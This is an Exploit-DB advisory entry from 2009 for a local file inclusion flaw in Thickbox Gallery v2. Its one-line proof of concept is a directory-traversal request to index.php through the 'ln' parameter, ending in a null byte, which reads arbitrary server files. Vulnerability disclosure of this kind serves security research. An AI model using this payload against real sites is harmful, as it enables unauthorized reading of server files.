Thickbox Gallery 2 - 'index.php' Local File Inclusion

EDB-ID:

8546


Author:

SirGod

Type:

webapps


Platform:

PHP

Date:

2009-04-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

##########################################################################################
[+] Thickbox Gallery v2 Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##########################################################################################

[+] Local File Inclusion

   PoC :
    http://127.0.0.1/[path]/index.php?ln=../../../../../../BOOTSECT.BAK%00

##########################################################################################

# milw0rm.com [2009-04-27]